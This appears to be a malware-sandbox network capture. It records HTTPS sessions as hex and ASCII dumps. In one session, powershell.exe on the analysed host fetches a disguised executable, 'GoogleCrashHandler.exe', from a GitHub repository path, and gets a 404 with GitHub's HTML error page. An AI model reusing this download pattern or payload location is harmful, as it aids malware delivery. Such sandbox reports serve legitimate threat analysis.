2f 6d 72 47 66 4f 65 42 30 38 2b 33 32 65 50 35 39 50 57 31 6a 79 6a 6a 64 58 4c 6a 59 62 54 73 61 75 70 30 57 66 79 31 2b 2f 6b 67 66 37 6a 2f 58 68 39 54
                                                                                              Data Ascii: n0/wBH+pvfD9P6t7VAsJ+CzniNnp59WOnDWNhtNXNpz0ZdNn7d+uuLW/o/XuJoB6dz+5Yzxmxxi/79PThccJts5n+zV0ZdNv7T+5a/t36n/ur/ALFj/IcNvNHax1t/0PEbvV2c9TpH7H+8Q37R+sO3+g9T/NWf8rwm+0drT1tf4zi91r7Oep0Wfy9++3h7P2X9fcN7f03qn/mrGfOeB08+32eP59PW1jyjjdXLjYbTsaup0Wfy1+/kgf7j/Xh9T
                                                                                              2022-08-10 04:47:59 UTC315INData Raw: 39 4a 37 66 61 39 2f 6a 73 2f 55 73 50 36 54 58 4d 48 2f 66 51 43 61 6a 2f 5a 6f 48 2f 77 41 30 4c 47 66 33 48 78 65 54 68 2b 2f 39 44 65 50 32 39 7a 4f 58 69 4f 35 39 54 66 32 6d 4a 4c 66 37 2b 31 6e 2f 41 4d 4c 70 2f 77 42 38 70 37 6a 2f 41 4e 76 33 2f 6f 50 62 33 2b 34 37 6e 31 6e 73 2f 70 50 59 35 2b 70 2b 2f 58 4e 6f 33 36 59 57 2b 2f 31 53 73 36 76 33 48 7a 38 4f 48 37 2f 30 74 61 66 32 39 78 38 64 76 33 50 71 50 2f 61 6a 30 58 50 2f 41 4a 33 66 56 76 38 41 6f 42 2f 72 46 6e 33 47 31 37 6a 48 61 7a 34 57 76 62 37 52 76 38 39 6e 36 68 48 39 4a 2f 52 64 6a 2b 39 2b 70 47 76 2b 7a 6a 2f 57 4a 37 6a 61 39 78 6a 74 66 53 76 74 39 6f 33 2b 65 7a 39 54 44 2b 6b 2f 6f 42 69 66 33 75 38 69 4d 68 39 41 44 7a 7a 4b 5a 2f 63 62 61 66 44 59 59 37 57 65 6f 39 76
                                                                                              Data Ascii: 9J7fa9/js/UsP6TXMH/fQCaj/ZoH/wA0LGf3HxeTh+/9DeP29zOXiO59Tf2mJLf7+1n/AMLp/wB8p7j/ANv3/oPb3+47n1ns/pPY5+p+/XNo36YW+/1Ss6v3Hz8OH7/0taf29x8dv3PqP/aj0XP/AJ3fVv8AoB/rFn3G17jHaz4Wvb7Rv89n6hH9J/Rdj+9+pGv+zj/WJ7ja9xjtfSvt9o3+ez9TD+k/oBif3u8iMh9ADzzKZ/cbafDYY7Weo9v
                                                                                              2022-08-10 04:47:59 UTC317INData Raw: 4d 54 33 43 34 7a 64 37 50 76 65 49 39 42 63 4a 76 4e 66 64 36 6d 2f 74 64 2b 7a 4d 54 2f 41 4c 66 2b 74 4f 6f 6e 30 2f 38 41 4d 31 54 33 44 34 7a 64 37 50 76 65 49 39 42 63 4a 76 4e 66 64 36 6d 2f 74 64 2b 79 73 2f 38 41 74 2f 36 33 6b 50 36 66 2b 5a 4b 65 34 66 47 62 76 5a 39 37 78 4a 36 43 34 54 65 61 2b 37 31 4e 2f 61 37 39 6c 6a 2f 78 2f 77 43 74 38 66 54 6f 33 2f 41 54 33 44 34 7a 64 37 50 76 65 4a 66 51 58 43 62 7a 58 33 65 6f 50 37 58 66 73 38 66 2b 50 2f 57 6b 73 37 67 2b 6d 33 6e 59 6e 75 46 78 6d 37 32 66 65 36 7a 30 46 77 6d 38 31 39 33 71 4b 66 36 57 66 74 62 75 50 33 50 39 57 4c 5a 59 59 32 45 2b 35 62 78 2b 34 6e 46 66 48 5a 61 50 78 36 32 4d 2f 59 50 44 66 44 61 36 2f 77 41 4f 6f 76 38 41 61 33 39 72 72 2f 76 54 39 53 78 44 67 47 33 30 78
                                                                                              Data Ascii: MT3C4zd7PveI9BcJvNfd6m/td+zMT/ALf+tOon0/8AM1T3D4zd7PveI9BcJvNfd6m/td+ys/8At/63kP6f+ZKe4fGbvZ97xJ6C4Tea+71N/a79lj/x/wCt8fTo3/AT3D4zd7PveJfQXCbzX3eoP7Xfs8f+P/Wks7g+m3nYnuFxm72fe6z0Fwm8193qKf6WftbuP3P9WLZYY2E+5bx+4nFfHZaPx62M/YPDfDa6/wAOov8Aa39rr/vT9SxDgG30x
                                                                                              2022-08-10 04:47:59 UTC318INData Raw: 70 67 48 39 42 5a 78 2f 70 76 54 2f 41 4d 35 62 39 61 2b 56 37 7a 50 5a 31 64 54 50 6f 2f 7a 50 64 34 37 57 6e 72 53 75 2f 6b 48 2b 61 67 57 48 37 61 4c 34 71 50 58 39 42 70 36 33 68 61 78 39 35 65 56 5a 78 2f 36 7a 2b 58 58 34 57 63 2f 61 50 6d 65 4d 2f 77 44 6c 33 74 50 69 53 75 2f 6b 4c 2b 61 77 44 2f 35 53 59 71 33 72 65 67 66 4c 36 69 31 6a 37 77 38 71 7a 79 66 39 33 64 31 2b 46 4d 2f 61 66 6d 65 4f 58 2f 71 37 32 6a 78 49 6e 2b 53 50 35 70 48 2f 41 4f 49 76 48 2f 61 65 6c 2f 6e 72 66 71 7a 79 76 66 59 36 4e 58 55 78 36 57 38 79 33 4f 65 6e 54 31 6f 33 66 79 62 2f 41 44 4d 43 52 64 2b 30 65 71 39 75 78 73 50 6d 4c 6c 72 48 33 52 35 5a 6e 6c 2f 37 74 50 34 39 54 47 66 74 72 7a 48 47 66 2f 48 56 2b 48 57 6c 66 2f 4b 48 38 79 57 73 2f 77 43 7a 2b 75 58
                                                                                              Data Ascii: pgH9BZx/pvT/AM5b9a+V7zPZ1dTPo/zPd47WnrSu/kH+agWH7aL4qPX9Bp63hax95eVZx/6z+XX4Wc/aPmeM/wDl3tPiSu/kL+awD/5SYq3regfL6i1j7w8qzyf93d1+FM/afmeOX/q72jxIn+SP5pH/AOIvH/ael/nrfqzyvfY6NXUx6W8y3OenT1o3fyb/ADMCRd+0eq9uxsPmLlrH3R5Znl/7tP49TGftrzHGf/HV+HWlf/KH8yWs/wCz+uX


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              4192.168.11.2049812140.82.121.4443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2022-08-10 04:48:02 UTC319OUTGET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1151
                                                                                              Host: github.com
                                                                                              Connection: Keep-Alive
                                                                                              2022-08-10 04:48:02 UTC320INHTTP/1.1 404 Not Found
                                                                                              Server: GitHub.com
                                                                                              Date: Wed, 10 Aug 2022 04:47:09 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              permissions-policy: interest-cohort=()
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                                                                              Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                              2022-08-10 04:48:02 UTC320INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                              2022-08-10 04:48:02 UTC322INData Raw: 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b
                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link
                                                                                              2022-08-10 04:48:02 UTC322INData Raw: 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72
                                                                                              Data Ascii: naws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossor
                                                                                              2022-08-10 04:48:02 UTC324INData Raw: 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 55 52 50 53 76 69 43 77 34 6d 34 6e 37 31 49 4b 6e 34 71 79 75 37 4d 45 44 70 47 62 43 69 54 66 73 4d 54 4e 72 55 6a 50 77 63 67 33 38 4b 74 45 4b 44 74 31 32 76 7a 6a 6c 4e 7a 6f 79 33 59 44 46 69 51 38 44 30 54 43 43 59 4b 43 74 72 5a 70 71 58 30 39 37 67 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 63 6f 6c 6f 72 62 6c 69 6e 64 2d 35 31 31 33 64 32 62 65 32 30 62 30 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 63 6f 6c 6f 72 62 6c 69 6e 64 22 20 63 72 6f 73
                                                                                              Data Ascii: tegrity="sha512-URPSviCw4m4n71IKn4qyu7MEDpGbCiTfsMTNrUjPwcg38KtEKDt12vzjlNzoy3YDFiQ8D0TCCYKCtrZpqX097g==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.css" /><link data-color-theme="light_colorblind" cros
                                                                                              2022-08-10 04:48:02 UTC325INData Raw: 20 2f 3e 0a 20 20 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 53 55 71 79 45 51 6f 71 69 79 62 46 34 54 47 64 4c 48 30 74 68 34 76 44 4c 39 49 39 45 46 47 54 58 66 63 74 68 39 43 49 56 41 6f 4e 65 51 4a 66 41 79 66 75 38 4d 74 6d 4f 4d 57 62 47 6e 71 50 36 56 78 46 49 51 36 56 64 44 48 78 68 64 58 4e 47 31 6b 2f 2f 51 3d 3d 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 70 72 69 6d 65 72 2d 34 39 34 61 62 32 31 31 30 61 32 61 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20
                                                                                              Data Ascii: /> <link crossorigin="anonymous" media="all" integrity="sha512-SUqyEQoqiybF4TGdLH0th4vDL9I9EFGTXfcth9CIVAoNeQJfAyfu8MtmOMWbGnqP6VxFIQ6VdDHxhdXNG1k//Q==" rel="stylesheet" href="https://github.githubassets.com/assets/primer-494ab2110a2a.css" />
                                                                                              2022-08-10 04:48:02 UTC326INData Raw: 5a 52 70 30 61 32 52 43 5a 4e 59 72 46 4a 59 46 6c 59 68 64 44 55 32 50 2b 55 43 38 61 78 67 56 54 31 37 6f 71 76 31 42 56 51 4c 6e 67 53 73 47 6f 69 42 4e 32 4d 4a 70 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6d 61 6e 75 65 6c 70 75 79 6f 6c 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 61 66 39 62 61 65 66 61 62 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61
                                                                                              Data Ascii: ZRp0a2RCZNYrFJYFlYhdDU2P+UC8axgVT17oqv1BVQLngSsGoiBN2MJpw==" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-8af9baefab9e.js"></script><script crossorigin="anonymous" defer="defer" type="applica
                                                                                              2022-08-10 04:48:02 UTC328INData Raw: 65 5f 6d 6f 64 75 6c 65 73 5f 64 65 6c 65 67 61 74 65 64 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 64 65 74 61 69 6c 73 2d 64 69 61 6c 6f 67 2d 65 6c 65 6d 65 6e 2d 36 33 64 65 62 65 2d 34 61 32 66 33 37 66 37 34 31 39 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 49 57 33 4a 73 65 4f 30 6d 30 79 63 6c 69 78 73 78 44 77 75 58 42 6c 41 70 30 2b 62 58 56 5a 6b 41 7a 63 56 52 64 35 6c 6b 43 44 30
                                                                                              Data Ascii: e_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-4a2f37f7419e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-IW3JseO0m0yclixsxDwuXBlAp0+bXVZkAzcVRd5lkCD0
                                                                                              2022-08-10 04:48:02 UTC329INData Raw: 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 62 33 64 33 32 66 2d 63 32 35 31 39 65 32 30 65 35 62 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22
                                                                                              Data Ascii: "https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-b3d32f-c2519e20e5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="
                                                                                              2022-08-10 04:48:02 UTC330INData Raw: 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 59 6c 5a 7a 66 44 73 30 73 4a 77 62 34 4c 44 50 6f 59 47 7a 70 70 61 61 73 47 2f 79 76 59 38 44 6f 6c 56 6b 36 34 75 37 4b 6a 70 79 7a 2f 4e 70 4b 53 33 45 37 74 6f 42 6b 48 63 44 78 4e 53 42 38 78 37 6d 6c 44 44 6a 43 32 6e 48 75 57 69 6c 74 73 4d 47 76 51 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74
                                                                                              Data Ascii: t crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-YlZzfDs0sJwb4LDPoYGzppaasG/yvY8DolVk64u7Kjpyz/NpKS3E7toBkHcDxNSB8x7mlDDjC2nHuWiltsMGvQ==" src="https://github.githubassets.com/assets/vendors-node_modules_github_remot
                                                                                              2022-08-10 04:48:02 UTC332INData Raw: 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 4d 55 71 6c 6c 55 31 7a 57 53 63 4a 72 47 34 34 75 68 50 69 4b 38 69 72 69 72 30 6e 77 36 53 65 70 47 76 70 2b 72 77 6a 52 51 52 6e 4c 6e 4b 54 6c 49 67 61 43 4f 31 4e 37 4f 45 5a 33 58 53 71 48 49 4a 79 4e 6e 5a 52 31 55 6c 41 32 39 6c 42 5a 72 71 78 53 77 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f
                                                                                              Data Ascii: t crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-MUqllU1zWScJrG44uhPiK8irir0nw6SepGvp+rwjRQRnLnKTlIgaCO1N7OEZ3XSqHIJyNnZR1UlA29lBZrqxSw==" src="https://github.githubassets.com/assets/app_assets_modules_github_behavio
                                                                                              2022-08-10 04:48:02 UTC333INData Raw: 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 64 62 37 39 35 39 62 35 66 66 66 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 35 31 32 2d 75 4e 66 37 63 49 5a 6a 6b 30 6f 52 65 31 71 46 6e 7a 56 50 31 65 46 72 6d 68 51 4b 71 36 31 41 51 70 77 4e 66 67 4d 62 6c 46 4b 47 4e 36 56 4e 7a 69 7a 77 6a 32 55 31 64 78 48 78 66 76 77 7a 75 2f 43 6d 2f 71 65 4b 6b 75 32 4d 75 6a 45 2f 61 75 4c 64 36 67 3d 3d 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74
                                                                                              Data Ascii: _behaviors_ht-83c235-db7959b5fff9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" integrity="sha512-uNf7cIZjk0oRe1qFnzVP1eFrmhQKq61AQpwNfgMblFKGN6VNzizwj2U1dxHxfvwzu/Cm/qeKku2MujE/auLd6g==" src="https://github.git
                                                                                              2022-08-10 04:48:02 UTC334INData Raw: 4c 43 4a 32 61 58 4e 70 64 47 39 79 58 32 6c 6b 49 6a 6f 69 4d 54 4d 34 4f 44 41 30 4d 6a 6b 34 4e 44 41 78 4d 54 41 79 4d 44 4d 32 4e 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 6c 5a 47 64 6c 49 6a 6f 69 5a 6e 4a 68 49 69 77 69 63 6d 56 6e 61 57 39 75 58 33 4a 6c 62 6d 52 6c 63 69 49 36 49 6d 6c 68 5a 43 4a 39 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 68 6d 61 63 22 20 63 6f 6e 74 65 6e 74 3d 22 37 33 66 37 36 63 37 30 35 33 39 36 35 32 65 32 30 31 39 32 64 30 34 35 31 36 64 32 64 31 37 33 65 35 38 32 34 61 61 32 62 33 62 62 33 36 64 32 31 33 66 39 62 66 39 38 39 35 66 64 39 64 31 66 22 20 64 61 74 61 2d 70 6a 61 78 2d 74 72 61 6e 73 69 65 6e 74
                                                                                              Data Ascii: LCJ2aXNpdG9yX2lkIjoiMTM4ODA0Mjk4NDAxMTAyMDM2NSIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImlhZCJ9" data-pjax-transient="true" /><meta name="visitor-hmac" content="73f76c70539652e20192d04516d2d173e5824aa2b3bb36d213f9bf9895fd9d1f" data-pjax-transient
                                                                                              2022-08-10 04:48:02 UTC336INData Raw: 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 6c 75 69 64 69 63 6f 6e 2e 70 6e 67 22 20 74 69 74 6c 65 3d 22 47 69 74 48 75 62 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 34 30 31 34 38 38 36 39 33 34 33 36 35 32 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 31 34 37 37 33 37 36 39 30 35 22 20 2f 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 3c 6d
                                                                                              Data Ascii: -icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta property="og:url" content="https://github.com"> <m
                                                                                              2022-08-10 04:48:02 UTC337INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 68 65 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 30 22 3e 0a 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 67 69 74 68 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 3a 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 33 33 33 34 37 36 32 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 67 69 74 68 75 62 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 63 72 65 61
                                                                                              Data Ascii: <meta property="og:image:height" content="620"> <meta property="twitter:site" content="github"> <meta property="twitter:site:id" content="13334762"> <meta property="twitter:creator" content="github"> <meta property="twitter:crea
                                                                                              2022-08-10 04:48:02 UTC338INData Raw: 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 63 73 73 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 30 32 30 65 35 30 34 30 64 66 64 62 62 33 36 36 30 36 65 62 64 63 65 65 35 62 34 31 32 62 31 39 63 64 37 66 30 39 36 36 39 33 64 65 30 64 31 33 63 66 61 39 36 39 32 39 36 38 36 66 33 65 32 63 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 63 6b 3d 22 72 65 6c 6f 61 64 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 70 6a 61 78 2d 6a 73 2d 76 65 72 73 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 31 39 34 63 64 34 63 34 62 34 63 38 32 36 66 38 65 63 31 35 30 31 37 36 37 31 34 34 38 34 64 33 38 32 33 31 37 31
                                                                                              Data Ascii: data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="020e5040dfdbb36606ebdcee5b412b19cd7f096693de0d13cfa96929686f3e2c" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="194cd4c4b4c826f8ec150176714484d3823171
